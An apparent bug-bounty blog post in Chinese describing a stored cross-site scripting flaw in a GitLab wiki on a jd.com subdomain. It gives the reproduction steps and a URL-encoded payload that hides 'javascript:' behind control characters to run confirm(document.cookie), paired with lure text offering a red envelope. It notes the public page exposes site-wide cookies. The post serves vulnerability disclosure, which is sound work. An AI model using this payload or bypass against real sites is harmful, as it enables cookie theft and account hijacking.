jd众测gitlab跨站脚本漏洞

Posted by Jaqen Blog on November 9, 2017

jd众测gitlab跨站脚本漏洞

http://xxxxx.jd.com/users/sign_in 首先注册一个账号ahtest
图片1
然后创建一个项目,要选择公开
图片2
然后在项目的wiki中创建markdown
图片3
payload:%3Ca+href%3D%22%01java%03script%3Aconfirm%28document.cookie%29%22%3E%E7%82%B9%E5%87%BB%E8%8E%B7%E5%8F%96%E7%BA%A2%E5%8C%85%3Ca%3E%0D%0A 在抓包中替换wiki content字段
图片4
http://xxxxx.jd.com/ahtest/alert/wikis/home 存储跨站证明页面 因为是公开的 所以不用有账号可以直接访问,因为属于jd.com的域所以可以抓到商城的cookie 图片5
成功触发

FEATURED TAGS